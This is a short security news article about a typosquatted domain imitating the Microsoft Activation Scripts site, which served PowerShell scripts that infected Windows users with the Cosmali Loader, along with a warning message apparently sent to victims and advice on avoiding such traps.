Fake MAS Windows activation domain utilized to distribute PowerShell malware.
- Dec 28, 2025
- 2 min read
Fake MAS Windows activation domain utilized to distribute PowerShell malware.
A typosquatted domain mimicking the Microsoft Activation Scripts (MAS) tool was utilized to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.
BleepingComputer discovered that several MAS users started reporting on Reddit [1, 2] yesterday about receiving pop-up warnings on their systems regarding a Cosmali Loader infection.
You have been infected by malware called 'cosmali loader' because you mistyped 'get.activated.win' as 'get.activate[.]win' while activating Windows in PowerShell
The malware's dashboard is not secure, allowing anyone who views it to access your computer.
Reinstall Windows and avoid repeating the same error in the future.
To verify that your computer is compromised, open Task Manager and look for unusual PowerShell processes.
According to reports, attackers have created a deceptive domain, "get.activate[.]win," which closely mimics the legitimate one found in the official MAS activation instructions, "get.activated.win."
Since the only difference between the two is one character ("d"), attackers rely on users mistyping the domain.
Security researcher RussianPanda identified that the alerts are linked to the open-source Cosmali Loader malware and may be connected to similar pop-up notifications observed by GDATA malware analyst Karsten Hahn.
Russian Panda informed Bleeping Computer that Cosmali Loader was used to deploy cryptomining tools and the XWorm remote access trojan (RAT).
While it's unclear who sent the warning messages to users, it's likely that a well-intentioned researcher accessed the malware control panel and utilized it to alert users about the compromise.
MAS is an open-source set of PowerShell scripts that automate the activation of Microsoft Windows and Microsoft Office through HWID activation, KMS emulation, and various bypasses (Ohook, TSforge).
The project is available on GitHub and is actively maintained. However, Microsoft considers it a piracy tool that activates products without a purchased license by using unauthorized methods that bypass its licensing system.
The project's maintainers also cautioned users about the campaign and advised them to verify the commands they enter before executing them.
It is advised that users refrain from running remote code unless they have a complete understanding of its function. Always test in a sandbox environment and avoid retyping commands to reduce the chance of retrieving harmful payloads from domains with typographical errors.
Unofficial Windows activators have frequently been exploited for malware distribution, so users should be aware of the potential dangers and exercise caution when utilizing these tools.
Comments